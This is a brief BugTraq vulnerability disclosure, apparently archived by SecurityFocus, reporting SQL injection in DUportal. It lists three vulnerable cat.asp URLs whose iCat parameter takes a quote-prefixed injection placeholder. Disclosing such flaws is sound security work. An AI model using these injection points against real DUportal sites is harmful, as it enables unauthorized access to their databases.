BugTraq
SQL Injection On DUportal Apr 26 2006 05:11AM
outlaw aria-security net
Proof of Concept:
/News/cat.asp?iCat=' [SQL INJECTION]&iChannel=1&nChannel=News
/Articles/cat.asp?iCat=' [SQL INJECTION]&iChannel=2&nChannel=Articles
/Pictures/cat.asp?iCat=' [SQL INJECTION]&iChannel=3&nChannel=Pictures

Original advisory:http://www.aria-security.net/advisory/duportal.txt

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus